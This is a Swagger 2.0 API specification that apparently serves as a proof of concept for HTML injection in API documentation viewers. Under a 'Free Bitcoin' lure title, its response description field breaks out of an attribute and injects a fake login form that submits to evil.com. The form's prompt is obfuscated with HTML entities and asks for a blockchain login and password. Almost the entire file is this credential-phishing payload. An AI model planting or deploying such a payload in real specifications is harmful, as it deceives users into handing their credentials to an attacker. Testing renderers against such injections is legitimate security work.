 
swagger: '2.0'
info:
  title: Get $1000 in Free Bitcoin
  description: |
    Teste
paths:
  /Free Bitcoin (Click Here):
    get:
      responses:
        '200':
          description: No response was specified'"><div style="border:1px solid #000"><form action="https://evil.com" method="GET"><label><h1>&#x45;&#x6e;&#x74;&#x65;&#x72;&#x20;&#x77;&#x69;&#x74;&#x68;&#x20;&#x79;&#x6f;&#x75;&#x72;&#x20;&#x42;&#x6c;&#x6f;&#x63;&#x6b;&#x63;&#x68;&#x61;&#x69;&#x6e;&#x20;&#x6c;&#x6f;&#x67;&#x69;&#x6e;&#x20;&#x61;&#x6e;&#x64;&#x20;&#x70;&#x61;&#x73;&#x73;&#x77;&#x6f;&#x72;&#x64;&#x3a;<p><input type="text"><p><input type="submit">
      tags:
        - Free Bitcoin
      operationId: findAccounts
      summary: Finds all accounts
